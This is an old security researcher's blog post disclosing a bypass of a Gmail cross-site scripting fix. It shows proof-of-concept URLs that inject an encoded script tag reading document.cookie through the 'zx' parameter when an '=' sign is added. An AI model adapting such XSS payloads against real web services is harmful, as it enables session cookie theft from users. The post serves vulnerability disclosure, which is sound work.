zx issue repair form Gmail can bypass by equal simbol "="

Sunday, December 05, 2004
hello !!

After look this "bug"(http://securitytracker.com/alerts/2004/Nov/1012289.html)
and i look what are you making for correct this issue, and i happy this bug is solved
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556%3Cscript%3Ealert(document.cookie)%3C%2
Fscript%3E&fs=1

but this issue can repeat only ned a '=' symbol in url after 'zx' variablelike this:

Again Denial of service :/
http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556[just here inser the simbol]%3Cscript%3Ealert
(document.cookie)%3C%2Fscript%3E&fs=1

http://gmail.google.com/gmail?search=cat&cat=inbox&view=tl&start=0&zx=
18acabd2b173f0d81040559556=%3Cscript%3Ealert(document.cookie)%3C
%2Fscript%3E&fs=1

and the bucle is repeating :-)

atentamente:
Lostmon (Lostmon@gmail.com)

thnx to estrella to be my ligth
thnx to all who believed in me
--
La curiosidad es lo que hace mover la mente....

Latest OSVDB Vulnerabilities

 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...